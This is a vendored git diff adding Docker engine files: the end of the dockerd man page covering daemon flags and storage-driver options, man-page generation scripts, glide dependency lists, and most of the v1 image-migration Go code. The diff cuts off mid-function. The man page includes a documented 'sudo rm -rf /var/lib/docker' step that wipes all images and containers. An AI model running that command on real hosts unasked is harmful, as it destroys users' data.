+ +**--experimental**="" + Enable the daemon experimental features. + +**--fixed-cidr**="" + IPv4 subnet for fixed IPs (e.g., 10.20.0.0/16); this subnet must be nested in + the bridge subnet (which is defined by \-b or \-\-bip). + +**--fixed-cidr-v6**="" + IPv6 subnet for global IPv6 addresses (e.g., 2a00:1450::/64) + +**-G**, **--group**="" + Group to assign the unix socket specified by -H when running in daemon mode. + use '' (the empty string) to disable setting of a group. Default is `docker`. + +**-g**, **--graph**="" + Path to use as the root of the Docker runtime. Default is `/var/lib/docker`. + +**-H**, **--host**=[*unix:///var/run/docker.sock*]: tcp://[host:port] to bind or +unix://[/path/to/socket] to use. + The socket(s) to bind to in daemon mode specified using one or more + tcp://host:port, unix:///path/to/socket, fd://* or fd://socketfd. + +**--help** + Print usage statement + +**--icc**=*true*|*false* + Allow unrestricted inter\-container and Docker daemon host communication. If + disabled, containers can still be linked together using the **--link** option + (see **docker-run(1)**). Default is true. + +**--init** + Run an init process inside containers for signal forwarding and process + reaping. + +**--init-path** + Path to the docker-init binary. + +**--insecure-registry**=[] + Enable insecure registry communication, i.e., enable un-encrypted and/or + untrusted communication. + + List of insecure registries can contain an element with CIDR notation to + specify a whole subnet. Insecure registries accept HTTP and/or accept HTTPS + with certificates from unknown CAs. + + Enabling `--insecure-registry` is useful when running a local registry. + However, because its use creates security vulnerabilities it should ONLY be + enabled for testing purposes. For increased security, users should add their + CA to their system's list of trusted CAs instead of using + `--insecure-registry`. 
+ +**--ip**="" + Default IP address to use when binding container ports. Default is `0.0.0.0`. + +**--ip-forward**=*true*|*false* + Enables IP forwarding on the Docker host. The default is `true`. This flag + interacts with the IP forwarding setting on your host system's kernel. If + your system has IP forwarding disabled, this setting enables it. If your + system has IP forwarding enabled, setting this flag to `--ip-forward=false` + has no effect. + + This setting will also enable IPv6 forwarding if you have both + `--ip-forward=true` and `--fixed-cidr-v6` set. Note that this may reject + Router Advertisements and interfere with the host's existing IPv6 + configuration. For more information, please consult the documentation about + "Advanced Networking - IPv6". + +**--ip-masq**=*true*|*false* + Enable IP masquerading for bridge's IP range. Default is true. + +**--iptables**=*true*|*false* + Enable Docker's addition of iptables rules. Default is true. + +**--ipv6**=*true*|*false* + Enable IPv6 support. Default is false. Docker will create an IPv6-enabled + bridge with address fe80::1 which will allow you to create IPv6-enabled + containers. Use together with `--fixed-cidr-v6` to provide globally routable + IPv6 addresses. IPv6 forwarding will be enabled if not used with + `--ip-forward=false`. This may collide with your host's current IPv6 + settings. For more information please consult the documentation about + "Advanced Networking - IPv6". + +**--isolation**="*default*" + Isolation specifies the type of isolation technology used by containers. + Note that the default on Windows server is `process`, and the default on + Windows client is `hyperv`. Linux only supports `default`. + +**-l**, **--log-level**="*debug*|*info*|*warn*|*error*|*fatal*" + Set the logging level. Default is `info`. 
+ +**--label**="[]" + Set key=value labels to the daemon (displayed in `docker info`) + +**--live-restore**=*false* + Enable live restore of running containers when the daemon starts so that they + are not restarted. This option is applicable only for docker daemon running + on Linux host. + +**--log-driver**="*json-file*|*syslog*|*journald*|*gelf*|*fluentd*|*awslogs*|*splunk*|*etwlogs*|*gcplogs*|*none*" + Default driver for container logs. Default is `json-file`. + **Warning**: `docker logs` command works only for `json-file` logging driver. + +**--log-opt**=[] + Logging driver specific options. + +**--mtu**=*0* + Set the containers network mtu. Default is `0`. + +**--max-concurrent-downloads**=*3* + Set the max concurrent downloads for each pull. Default is `3`. + +**--max-concurrent-uploads**=*5* + Set the max concurrent uploads for each push. Default is `5`. + +**-p**, **--pidfile**="" + Path to use for daemon PID file. Default is `/var/run/docker.pid` + +**--raw-logs** + Output daemon logs in full timestamp format without ANSI coloring. If this + flag is not set, the daemon outputs condensed, colorized logs if a terminal + is detected, or full ("raw") output otherwise. + +**--registry-mirror**=*://* + Prepend a registry mirror to be used for image pulls. May be specified + multiple times. + +**-s**, **--storage-driver**="" + Force the Docker runtime to use a specific storage driver. + +**--seccomp-profile**="" + Path to seccomp profile. + +**--selinux-enabled**=*true*|*false* + Enable selinux support. Default is false. + +**--shutdown-timeout**=*15* + Set the shutdown timeout value in seconds. Default is `15`. + +**--storage-opt**=[] + Set storage driver options. See STORAGE DRIVER OPTIONS. + +**--swarm-default-advertise-addr**=*IP|INTERFACE* + Set default address or interface for swarm to advertise as its + externally-reachable address to other cluster members. This can be a + hostname, an IP address, or an interface such as `eth0`. 
A port cannot be + specified with this option. + +**--tls**=*true*|*false* + Use TLS; implied by --tlsverify. Default is false. + +**--tlscacert**=*~/.docker/ca.pem* + Trust certs signed only by this CA. + +**--tlscert**=*~/.docker/cert.pem* + Path to TLS certificate file. + +**--tlskey**=*~/.docker/key.pem* + Path to TLS key file. + +**--tlsverify**=*true*|*false* + Use TLS and verify the remote (daemon: verify client, client: verify daemon). + Default is false. + +**--userland-proxy**=*true*|*false* + Rely on a userland proxy implementation for inter-container and + outside-to-container loopback communications. Default is true. + +**--userland-proxy-path**="" + Path to the userland proxy binary. + +**--userns-remap**=*default*|*uid:gid*|*user:group*|*user*|*uid* + Enable user namespaces for containers on the daemon. Specifying "default" + will cause a new user and group to be created to handle UID and GID range + remapping for the user namespace mappings used for contained processes. + Specifying a user (or uid) and optionally a group (or gid) will cause the + daemon to lookup the user and group's subordinate ID ranges for use as the + user namespace mappings for contained processes. + +# STORAGE DRIVER OPTIONS + +Docker uses storage backends (known as "graphdrivers" in the Docker +internals) to create writable containers from images. Many of these +backends use operating system level technologies and can be +configured. + +Specify options to the storage backend with **--storage-opt** flags. The +backends that currently take options are *devicemapper*, *zfs* and *btrfs*. +Options for *devicemapper* are prefixed with *dm*, options for *zfs* +start with *zfs* and options for *btrfs* start with *btrfs*. + +Specifically for devicemapper, the default is a "loopback" model which +requires no pre-configuration, but is extremely inefficient. Do not +use it in production. 
+ +To make the best use of Docker with the devicemapper backend, you must +have a recent version of LVM. Use `lvm` to create a thin pool; for +more information see `man lvmthin`. Then, use `--storage-opt +dm.thinpooldev` to tell the Docker engine to use that pool for +allocating images and container snapshots. + +## Devicemapper options + +#### dm.thinpooldev + +Specifies a custom block storage device to use for the thin pool. + +If using a block device for device mapper storage, it is best to use `lvm` +to create and manage the thin-pool volume. This volume is then handed to Docker +to exclusively create snapshot volumes needed for images and containers. + +Managing the thin-pool outside of Engine makes for the most feature-rich +method of having Docker utilize device mapper thin provisioning as the +backing storage for Docker containers. The highlights of the lvm-based +thin-pool management feature include: automatic or interactive thin-pool +resize support, dynamically changing thin-pool features, automatic thinp +metadata checking when lvm activates the thin-pool, etc. + +As a fallback if no thin pool is provided, loopback files are +created. Loopback is very slow, but can be used without any +pre-configuration of storage. It is strongly recommended that you do +not use loopback in production. Ensure your Engine daemon has a +`--storage-opt dm.thinpooldev` argument provided. + +Example use: + + $ dockerd \ + --storage-opt dm.thinpooldev=/dev/mapper/thin-pool + +#### dm.basesize + +Specifies the size to use when creating the base device, which limits +the size of images and containers. The default value is 10G. Note, +thin devices are inherently "sparse", so a 10G device which is mostly +empty doesn't use 10 GB of space on the pool. However, the filesystem +will use more space for base images the larger the device +is. 
+ +The base device size can be increased at daemon restart which will allow +all future images and containers (based on those new images) to be of the +new base device size. + +Example use: `dockerd --storage-opt dm.basesize=50G` + +This will increase the base device size to 50G. The Docker daemon will throw an +error if existing base device size is larger than 50G. A user can use +this option to expand the base device size however shrinking is not permitted. + +This value affects the system-wide "base" empty filesystem that may already +be initialized and inherited by pulled images. Typically, a change to this +value requires additional steps to take effect: + + $ sudo service docker stop + $ sudo rm -rf /var/lib/docker + $ sudo service docker start + +Example use: `dockerd --storage-opt dm.basesize=20G` + +#### dm.fs + +Specifies the filesystem type to use for the base device. The +supported options are `ext4` and `xfs`. The default is `ext4`. + +Example use: `dockerd --storage-opt dm.fs=xfs` + +#### dm.mkfsarg + +Specifies extra mkfs arguments to be used when creating the base device. + +Example use: `dockerd --storage-opt "dm.mkfsarg=-O ^has_journal"` + +#### dm.mountopt + +Specifies extra mount options used when mounting the thin devices. + +Example use: `dockerd --storage-opt dm.mountopt=nodiscard` + +#### dm.use_deferred_removal + +Enables use of deferred device removal if `libdm` and the kernel driver +support the mechanism. + +Deferred device removal means that if device is busy when devices are +being removed/deactivated, then a deferred removal is scheduled on +device. And devices automatically go away when last user of the device +exits. + +For example, when a container exits, its associated thin device is removed. If +that device has leaked into some other mount namespace and can't be removed, +the container exit still succeeds and this option causes the system to schedule +the device for deferred removal. 
It does not wait in a loop trying to remove a +busy device. + +Example use: `dockerd --storage-opt dm.use_deferred_removal=true` + +#### dm.use_deferred_deletion + +Enables use of deferred device deletion for thin pool devices. By default, +thin pool device deletion is synchronous. Before a container is deleted, the +Docker daemon removes any associated devices. If the storage driver can not +remove a device, the container deletion fails and daemon returns. + +`Error deleting container: Error response from daemon: Cannot destroy container` + +To avoid this failure, enable both deferred device deletion and deferred +device removal on the daemon. + +`dockerd --storage-opt dm.use_deferred_deletion=true --storage-opt dm.use_deferred_removal=true` + +With these two options enabled, if a device is busy when the driver is +deleting a container, the driver marks the device as deleted. Later, when the +device isn't in use, the driver deletes it. + +In general it should be safe to enable this option by default. It will help +when unintentional leaking of mount point happens across multiple mount +namespaces. + +#### dm.loopdatasize + +**Note**: This option configures devicemapper loopback, which should not be +used in production. + +Specifies the size to use when creating the loopback file for the "data" device +which is used for the thin pool. The default size is 100G. The file is sparse, +so it will not initially take up this much space. + +Example use: `dockerd --storage-opt dm.loopdatasize=200G` + +#### dm.loopmetadatasize + +**Note**: This option configures devicemapper loopback, which should not be +used in production. + +Specifies the size to use when creating the loopback file for the "metadata" +device which is used for the thin pool. The default size is 2G. The file is +sparse, so it will not initially take up this much space. 
+ +Example use: `dockerd --storage-opt dm.loopmetadatasize=4G` + +#### dm.datadev + +(Deprecated, use `dm.thinpooldev`) + +Specifies a custom blockdevice to use for data for a Docker-managed thin pool. +It is better to use `dm.thinpooldev` - see the documentation for it above for +discussion of the advantages. + +#### dm.metadatadev + +(Deprecated, use `dm.thinpooldev`) + +Specifies a custom blockdevice to use for metadata for a Docker-managed thin +pool. See `dm.datadev` for why this is deprecated. + +#### dm.blocksize + +Specifies a custom blocksize to use for the thin pool. The default +blocksize is 64K. + +Example use: `dockerd --storage-opt dm.blocksize=512K` + +#### dm.blkdiscard + +Enables or disables the use of `blkdiscard` when removing devicemapper devices. +This is disabled by default due to the additional latency, but as a special +case with loopback devices it will be enabled, in order to re-sparsify the +loopback file on image/container removal. + +Disabling this on loopback can lead to *much* faster container removal times, +but it also prevents the space used in `/var/lib/docker` directory from being +returned to the system for other use when containers are removed. + +Example use: `dockerd --storage-opt dm.blkdiscard=false` + +#### dm.override_udev_sync_check + +By default, the devicemapper backend attempts to synchronize with the `udev` +device manager for the Linux kernel. This option allows disabling that +synchronization, to continue even though the configuration may be buggy. + +To view the `udev` sync support of a Docker daemon that is using the +`devicemapper` driver, run: + + $ docker info + [...] + Udev Sync Supported: true + [...] + +When `udev` sync support is `true`, then `devicemapper` and `udev` can +coordinate the activation and deactivation of devices for containers. + +When `udev` sync support is `false`, a race condition occurs between the +`devicemapper` and `udev` during create and cleanup. 
The race condition results
+in errors and failures. (For information on these failures, see
+[docker#4036](https://github.com/docker/docker/issues/4036))
+
+To allow the `docker` daemon to start, regardless of whether `udev` sync is
+`false`, set `dm.override_udev_sync_check` to true:
+
+    $ dockerd --storage-opt dm.override_udev_sync_check=true
+
+When this value is `true`, the driver continues and simply warns you the errors
+are happening.
+
+**Note**: The ideal is to pursue a `docker` daemon and environment that does
+support synchronizing with `udev`. For further discussion on this topic, see
+[docker#4036](https://github.com/docker/docker/issues/4036).
+Otherwise, set this flag for migrating existing Docker daemons to a daemon with
+a supported environment.
+
+#### dm.min_free_space
+
+Specifies the minimum free space percent in a thin pool required for new device
+creation to succeed. This check applies to both free data space as well
+as free metadata space. Valid values are from 0% - 99%. Value 0% disables
+free space checking logic. If user does not specify a value for this option,
+the Engine uses a default value of 10%.
+
+Whenever a new thin pool device is created (during `docker pull` or during
+container creation), the Engine checks if the minimum free space is available.
+If the space is unavailable, then device creation fails and any relevant
+`docker` operation fails.
+
+To recover from this error, you must create more free space in the thin
+pool. You can create free space by deleting some images and
+containers from the thin pool. You can also add more storage to the thin pool.
+
+To add more space to an LVM (logical volume management) thin pool, just add
+more storage to the volume group containing the thin pool; this should automatically
+resolve any errors. If your configuration uses loop devices, then stop the
+Engine daemon, grow the size of loop files and restart the daemon to resolve
+the issue.
+
+Example use: `dockerd --storage-opt dm.min_free_space=10%`
+
+#### dm.xfs_nospace_max_retries
+
+Specifies the maximum number of retries XFS should attempt to complete IO when
+ENOSPC (no space) error is returned by underlying storage device.
+
+By default XFS retries infinitely for IO to finish and this can result in an
+unkillable process. To change this behavior one can set xfs_nospace_max_retries
+to say 0 and XFS will not retry IO after getting ENOSPC and will shut down
+the filesystem.
+
+Example use:
+
+    $ sudo dockerd --storage-opt dm.xfs_nospace_max_retries=0
+
+
+## ZFS options
+
+#### zfs.fsname
+
+Set zfs filesystem under which docker will create its own datasets. By default
+docker will pick up the zfs filesystem where docker graph (`/var/lib/docker`)
+is located.
+
+Example use: `dockerd -s zfs --storage-opt zfs.fsname=zroot/docker`
+
+## Btrfs options
+
+#### btrfs.min_space
+
+Specifies the minimum size to use when creating the subvolume which is used for
+containers. If user uses disk quota for btrfs when creating or running a
+container with **--storage-opt size** option, docker should ensure the **size**
+cannot be smaller than **btrfs.min_space**.
+
+Example use: `docker daemon -s btrfs --storage-opt btrfs.min_space=10G`
+
+# CLUSTER STORE OPTIONS
+
+The daemon uses libkv to advertise the node within the cluster. Some Key/Value
+backends support mutual TLS, and the client TLS settings used by the daemon can
+be configured using the **--cluster-store-opt** flag, specifying the paths to
+PEM encoded files.
+
+#### kv.cacertfile
+
+Specifies the path to a local file with PEM encoded CA certificates to trust.
+
+#### kv.certfile
+
+Specifies the path to a local file with a PEM encoded certificate. This
+certificate is used as the client cert for communication with the Key/Value
+store.
+
+#### kv.keyfile
+
+Specifies the path to a local file with a PEM encoded private key. 
This +private key is used as the client key for communication with the Key/Value +store. + +# Access authorization + +Docker's access authorization can be extended by authorization plugins that +your organization can purchase or build themselves. You can install one or more +authorization plugins when you start the Docker `daemon` using the +`--authorization-plugin=PLUGIN_ID` option. + +```bash +dockerd --authorization-plugin=plugin1 --authorization-plugin=plugin2,... +``` + +The `PLUGIN_ID` value is either the plugin's name or a path to its +specification file. The plugin's implementation determines whether you can +specify a name or path. Consult with your Docker administrator to get +information about the plugins available to you. + +Once a plugin is installed, requests made to the `daemon` through the command +line or Docker's Engine API are allowed or denied by the plugin. If you have +multiple plugins installed, at least one must allow the request for it to +complete. + +For information about how to create an authorization plugin, see [authorization +plugin](https://docs.docker.com/engine/extend/authorization/) section in the +Docker extend section of this documentation. + + +# HISTORY +Sept 2015, Originally compiled by Shishir Mahajan +based on docker.com source material and internal work. 
diff --git a/vendor/github.com/docker/docker/man/generate.go b/vendor/github.com/docker/docker/man/generate.go new file mode 100644 index 0000000000..f21614d94a --- /dev/null +++ b/vendor/github.com/docker/docker/man/generate.go @@ -0,0 +1,43 @@ +package main + +import ( + "fmt" + "os" + + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/commands" + "github.com/docker/docker/pkg/term" + "github.com/spf13/cobra" + "github.com/spf13/cobra/doc" +) + +func generateManPages(path string) error { + header := &doc.GenManHeader{ + Title: "DOCKER", + Section: "1", + Source: "Docker Community", + } + + stdin, stdout, stderr := term.StdStreams() + dockerCli := command.NewDockerCli(stdin, stdout, stderr) + cmd := &cobra.Command{Use: "docker"} + commands.AddCommands(cmd, dockerCli) + + cmd.DisableAutoGenTag = true + return doc.GenManTreeFromOpts(cmd, doc.GenManTreeOptions{ + Header: header, + Path: path, + CommandSeparator: "-", + }) +} + +func main() { + path := "/tmp" + if len(os.Args) > 1 { + path = os.Args[1] + } + fmt.Printf("Generating man pages into %s\n", path) + if err := generateManPages(path); err != nil { + fmt.Fprintf(os.Stderr, "Failed to generate man pages: %s\n", err.Error()) + } +} diff --git a/vendor/github.com/docker/docker/man/generate.sh b/vendor/github.com/docker/docker/man/generate.sh new file mode 100755 index 0000000000..e4126ba4ac --- /dev/null +++ b/vendor/github.com/docker/docker/man/generate.sh @@ -0,0 +1,15 @@ +#!/bin/bash +# +# Generate man pages for docker/docker +# + +set -eu + +mkdir -p ./man/man1 + +# Generate man pages from cobra commands +go build -o /tmp/gen-manpages ./man +/tmp/gen-manpages ./man/man1 + +# Generate legacy pages from markdown +./man/md2man-all.sh -q diff --git a/vendor/github.com/docker/docker/man/glide.lock b/vendor/github.com/docker/docker/man/glide.lock new file mode 100644 index 0000000000..5ec765a4c6 --- /dev/null +++ b/vendor/github.com/docker/docker/man/glide.lock @@ -0,0 +1,52 @@ +hash: 
ead3ea293a6143fe41069ebec814bf197d8c43a92cc7666b1f7e21a419b46feb +updated: 2016-06-20T21:53:35.420817456Z +imports: +- name: github.com/BurntSushi/toml + version: f0aeabca5a127c4078abb8c8d64298b147264b55 +- name: github.com/cpuguy83/go-md2man + version: a65d4d2de4d5f7c74868dfa9b202a3c8be315aaa + subpackages: + - md2man +- name: github.com/fsnotify/fsnotify + version: 30411dbcefb7a1da7e84f75530ad3abe4011b4f8 +- name: github.com/hashicorp/hcl + version: da486364306ed66c218be9b7953e19173447c18b + subpackages: + - hcl/ast + - hcl/parser + - hcl/token + - json/parser + - hcl/scanner + - hcl/strconv + - json/scanner + - json/token +- name: github.com/inconshreveable/mousetrap + version: 76626ae9c91c4f2a10f34cad8ce83ea42c93bb75 +- name: github.com/magiconair/properties + version: c265cfa48dda6474e208715ca93e987829f572f8 +- name: github.com/mitchellh/mapstructure + version: d2dd0262208475919e1a362f675cfc0e7c10e905 +- name: github.com/russross/blackfriday + version: 1d6b8e9301e720b08a8938b8c25c018285885438 +- name: github.com/shurcooL/sanitized_anchor_name + version: 10ef21a441db47d8b13ebcc5fd2310f636973c77 +- name: github.com/spf13/cast + version: 27b586b42e29bec072fe7379259cc719e1289da6 +- name: github.com/spf13/jwalterweatherman + version: 33c24e77fb80341fe7130ee7c594256ff08ccc46 +- name: github.com/spf13/pflag + version: dabebe21bf790f782ea4c7bbd2efc430de182afd +- name: github.com/spf13/viper + version: c1ccc378a054ea8d4e38d8c67f6938d4760b53dd +- name: golang.org/x/sys + version: 62bee037599929a6e9146f29d10dd5208c43507d + subpackages: + - unix +- name: gopkg.in/yaml.v2 + version: a83829b6f1293c91addabc89d0571c246397bbf4 +- name: github.com/spf13/cobra + repo: https://github.com/dnephin/cobra + subpackages: + - doc + version: v1.3 +devImports: [] diff --git a/vendor/github.com/docker/docker/man/glide.yaml b/vendor/github.com/docker/docker/man/glide.yaml new file mode 100644 index 0000000000..e99b2670d8 --- /dev/null +++ b/vendor/github.com/docker/docker/man/glide.yaml @@ 
-0,0 +1,12 @@ +package: github.com/docker/docker/man +import: +- package: github.com/cpuguy83/go-md2man + subpackages: + - md2man +- package: github.com/inconshreveable/mousetrap +- package: github.com/spf13/pflag +- package: github.com/spf13/viper +- package: github.com/spf13/cobra + repo: https://github.com/dnephin/cobra + subpackages: + - doc diff --git a/vendor/github.com/docker/docker/man/md2man-all.sh b/vendor/github.com/docker/docker/man/md2man-all.sh new file mode 100755 index 0000000000..97c65c93bc --- /dev/null +++ b/vendor/github.com/docker/docker/man/md2man-all.sh @@ -0,0 +1,22 @@ +#!/bin/bash +set -e + +# get into this script's directory +cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" + +[ "$1" = '-q' ] || { + set -x + pwd +} + +for FILE in *.md; do + base="$(basename "$FILE")" + name="${base%.md}" + num="${name##*.}" + if [ -z "$num" -o "$name" = "$num" ]; then + # skip files that aren't of the format xxxx.N.md (like README.md) + continue + fi + mkdir -p "./man${num}" + go-md2man -in "$FILE" -out "./man${num}/${name}" +done diff --git a/vendor/github.com/docker/docker/migrate/v1/migratev1.go b/vendor/github.com/docker/docker/migrate/v1/migratev1.go new file mode 100644 index 0000000000..bc42dd2ca4 --- /dev/null +++ b/vendor/github.com/docker/docker/migrate/v1/migratev1.go @@ -0,0 +1,504 @@ +package v1 + +import ( + "errors" + "fmt" + "io/ioutil" + "os" + "path/filepath" + "runtime" + "strconv" + "sync" + "time" + + "encoding/json" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/image" + imagev1 "github.com/docker/docker/image/v1" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/reference" +) + +type graphIDRegistrar interface { + RegisterByGraphID(string, layer.ChainID, layer.DiffID, string, int64) (layer.Layer, error) + Release(layer.Layer) ([]layer.Metadata, error) +} + +type graphIDMounter 
interface { + CreateRWLayerByGraphID(string, string, layer.ChainID) error +} + +type checksumCalculator interface { + ChecksumForGraphID(id, parent, oldTarDataPath, newTarDataPath string) (diffID layer.DiffID, size int64, err error) +} + +const ( + graphDirName = "graph" + tarDataFileName = "tar-data.json.gz" + migrationFileName = ".migration-v1-images.json" + migrationTagsFileName = ".migration-v1-tags" + migrationDiffIDFileName = ".migration-diffid" + migrationSizeFileName = ".migration-size" + migrationTarDataFileName = ".migration-tardata" + containersDirName = "containers" + configFileNameLegacy = "config.json" + configFileName = "config.v2.json" + repositoriesFilePrefixLegacy = "repositories-" +) + +var ( + errUnsupported = errors.New("migration is not supported") +) + +// Migrate takes an old graph directory and transforms the metadata into the +// new format. +func Migrate(root, driverName string, ls layer.Store, is image.Store, rs reference.Store, ms metadata.Store) error { + graphDir := filepath.Join(root, graphDirName) + if _, err := os.Lstat(graphDir); os.IsNotExist(err) { + return nil + } + + mappings, err := restoreMappings(root) + if err != nil { + return err + } + + if cc, ok := ls.(checksumCalculator); ok { + CalculateLayerChecksums(root, cc, mappings) + } + + if registrar, ok := ls.(graphIDRegistrar); !ok { + return errUnsupported + } else if err := migrateImages(root, registrar, is, ms, mappings); err != nil { + return err + } + + err = saveMappings(root, mappings) + if err != nil { + return err + } + + if mounter, ok := ls.(graphIDMounter); !ok { + return errUnsupported + } else if err := migrateContainers(root, mounter, is, mappings); err != nil { + return err + } + + if err := migrateRefs(root, driverName, rs, mappings); err != nil { + return err + } + + return nil +} + +// CalculateLayerChecksums walks an old graph directory and calculates checksums +// for each layer. These checksums are later used for migration. 
+func CalculateLayerChecksums(root string, ls checksumCalculator, mappings map[string]image.ID) { + graphDir := filepath.Join(root, graphDirName) + // spawn some extra workers also for maximum performance because the process is bounded by both cpu and io + workers := runtime.NumCPU() * 3 + workQueue := make(chan string, workers) + + wg := sync.WaitGroup{} + + for i := 0; i < workers; i++ { + wg.Add(1) + go func() { + for id := range workQueue { + start := time.Now() + if err := calculateLayerChecksum(graphDir, id, ls); err != nil { + logrus.Errorf("could not calculate checksum for %q, %q", id, err) + } + elapsed := time.Since(start) + logrus.Debugf("layer %s took %.2f seconds", id, elapsed.Seconds()) + } + wg.Done() + }() + } + + dir, err := ioutil.ReadDir(graphDir) + if err != nil { + logrus.Errorf("could not read directory %q", graphDir) + return + } + for _, v := range dir { + v1ID := v.Name() + if err := imagev1.ValidateID(v1ID); err != nil { + continue + } + if _, ok := mappings[v1ID]; ok { // support old migrations without helper files + continue + } + workQueue <- v1ID + } + close(workQueue) + wg.Wait() +} + +func calculateLayerChecksum(graphDir, id string, ls checksumCalculator) error { + diffIDFile := filepath.Join(graphDir, id, migrationDiffIDFileName) + if _, err := os.Lstat(diffIDFile); err == nil { + return nil + } else if !os.IsNotExist(err) { + return err + } + + parent, err := getParent(filepath.Join(graphDir, id)) + if err != nil { + return err + } + + diffID, size, err := ls.ChecksumForGraphID(id, parent, filepath.Join(graphDir, id, tarDataFileName), filepath.Join(graphDir, id, migrationTarDataFileName)) + if err != nil { + return err + } + + if err := ioutil.WriteFile(filepath.Join(graphDir, id, migrationSizeFileName), []byte(strconv.Itoa(int(size))), 0600); err != nil { + return err + } + + if err := ioutils.AtomicWriteFile(filepath.Join(graphDir, id, migrationDiffIDFileName), []byte(diffID), 0600); err != nil { + return err + } + + 
logrus.Infof("calculated checksum for layer %s: %s", id, diffID) + return nil +} + +func restoreMappings(root string) (map[string]image.ID, error) { + mappings := make(map[string]image.ID) + + mfile := filepath.Join(root, migrationFileName) + f, err := os.Open(mfile) + if err != nil && !os.IsNotExist(err) { + return nil, err + } else if err == nil { + err := json.NewDecoder(f).Decode(&mappings) + if err != nil { + f.Close() + return nil, err + } + f.Close() + } + + return mappings, nil +} + +func saveMappings(root string, mappings map[string]image.ID) error { + mfile := filepath.Join(root, migrationFileName) + f, err := os.OpenFile(mfile, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600) + if err != nil { + return err + } + defer f.Close() + if err := json.NewEncoder(f).Encode(mappings); err != nil { + return err + } + return nil +} + +func migrateImages(root string, ls graphIDRegistrar, is image.Store, ms metadata.Store, mappings map[string]image.ID) error { + graphDir := filepath.Join(root, graphDirName) + + dir, err := ioutil.ReadDir(graphDir) + if err != nil { + return err + } + for _, v := range dir { + v1ID := v.Name() + if err := imagev1.ValidateID(v1ID); err != nil { + continue + } + if _, exists := mappings[v1ID]; exists { + continue + } + if err := migrateImage(v1ID, root, ls, is, ms, mappings); err != nil { + continue + } + } + + return nil +} + +func migrateContainers(root string, ls graphIDMounter, is image.Store, imageMappings map[string]image.ID) error { + containersDir := filepath.Join(root, containersDirName) + dir, err := ioutil.ReadDir(containersDir) + if err != nil { + return err + } + for _, v := range dir { + id := v.Name() + + if _, err := os.Stat(filepath.Join(containersDir, id, configFileName)); err == nil { + continue + } + + containerJSON, err := ioutil.ReadFile(filepath.Join(containersDir, id, configFileNameLegacy)) + if err != nil { + logrus.Errorf("migrate container error: %v", err) + continue + } + + var c map[string]*json.RawMessage + if err 
:= json.Unmarshal(containerJSON, &c); err != nil { + logrus.Errorf("migrate container error: %v", err) + continue + } + + imageStrJSON, ok := c["Image"] + if !ok { + return fmt.Errorf("invalid container configuration for %v", id) + } + + var image string + if err := json.Unmarshal([]byte(*imageStrJSON), &image); err != nil { + logrus.Errorf("migrate container error: %v", err) + continue + } + + imageID, ok := imageMappings[image] + if !ok { + logrus.Errorf("image not migrated %v", imageID) // non-fatal error + continue + } + + c["Image"] = rawJSON(imageID) + + containerJSON, err = json.Marshal(c) + if err != nil { + return err + } + + if err := ioutil.WriteFile(filepath.Join(containersDir, id, configFileName), containerJSON, 0600); err != nil { + return err + } + + img, err := is.Get(imageID) + if err != nil { + return err + } + + if err := ls.CreateRWLayerByGraphID(id, id, img.RootFS.ChainID()); err != nil { + logrus.Errorf("migrate container error: %v", err) + continue + } + + logrus.Infof("migrated container %s to point to %s", id, imageID) + + } + return nil +} + +type refAdder interface { + AddTag(ref reference.Named, id digest.Digest, force bool) error + AddDigest(ref reference.Canonical, id digest.Digest, force bool) error +} + +func migrateRefs(root, driverName string, rs refAdder, mappings map[string]image.ID) error { + migrationFile := filepath.Join(root, migrationTagsFileName) + if _, err := os.Lstat(migrationFile); !os.IsNotExist(err) { + return err + } + + type repositories struct { + Repositories map[string]map[string]string + } + + var repos repositories + + f, err := os.Open(filepath.Join(root, repositoriesFilePrefixLegacy+driverName)) + if err != nil { + if os.IsNotExist(err) { + return nil + } + return err + } + defer f.Close() + if err := json.NewDecoder(f).Decode(&repos); err != nil { + return err + } + + for name, repo := range repos.Repositories { + for tag, id := range repo { + if strongID, exists := mappings[id]; exists { + ref, err := 
reference.WithName(name) + if err != nil { + logrus.Errorf("migrate tags: invalid name %q, %q", name, err) + continue + } + if dgst, err := digest.ParseDigest(tag); err == nil { + canonical, err := reference.WithDigest(reference.TrimNamed(ref), dgst) + if err != nil { + logrus.Errorf("migrate tags: invalid digest %q, %q", dgst, err) + continue + } + if err := rs.AddDigest(canonical, strongID.Digest(), false); err != nil { + logrus.Errorf("can't migrate digest %q for %q, err: %q", ref.String(), strongID, err) + } + } else { + tagRef, err := reference.WithTag(ref, tag) + if err != nil { + logrus.Errorf("migrate tags: invalid tag %q, %q", tag, err) + continue + } + if err := rs.AddTag(tagRef, strongID.Digest(), false); err != nil { + logrus.Errorf("can't migrate tag %q for %q, err: %q", ref.String(), strongID, err) + } + } + logrus.Infof("migrated tag %s:%s to point to %s", name, tag, strongID) + } + } + } + + mf, err := os.Create(migrationFile) + if err != nil { + return err + } + mf.Close() + + return nil +} + +func getParent(confDir string) (string, error) { + jsonFile := filepath.Join(confDir, "json") + imageJSON, err := ioutil.ReadFile(jsonFile) + if err != nil { + return "", err + } + var parent struct { + Parent string + ParentID digest.Digest `json:"parent_id"` + } + if err := json.Unmarshal(imageJSON, &parent); err != nil { + return "", err + } + if parent.Parent == "" && parent.ParentID != "" { // v1.9 + parent.Parent = parent.ParentID.Hex() + } + // compatibilityID for parent + parentCompatibilityID, err := ioutil.ReadFile(filepath.Join(confDir, "parent")) + if err == nil && len(parentCompatibilityID) > 0 { + parent.Parent = string(parentCompatibilityID) + } + return parent.Parent, nil +} + +func migrateImage(id, root string, ls graphIDRegistrar, is image.Store, ms metadata.Store, mappings map[string]image.ID) (err error) { + defer func() { + if err != nil { + logrus.Errorf("migration failed for %v, err: %v", id, err) + } + }() + + parent, err := 
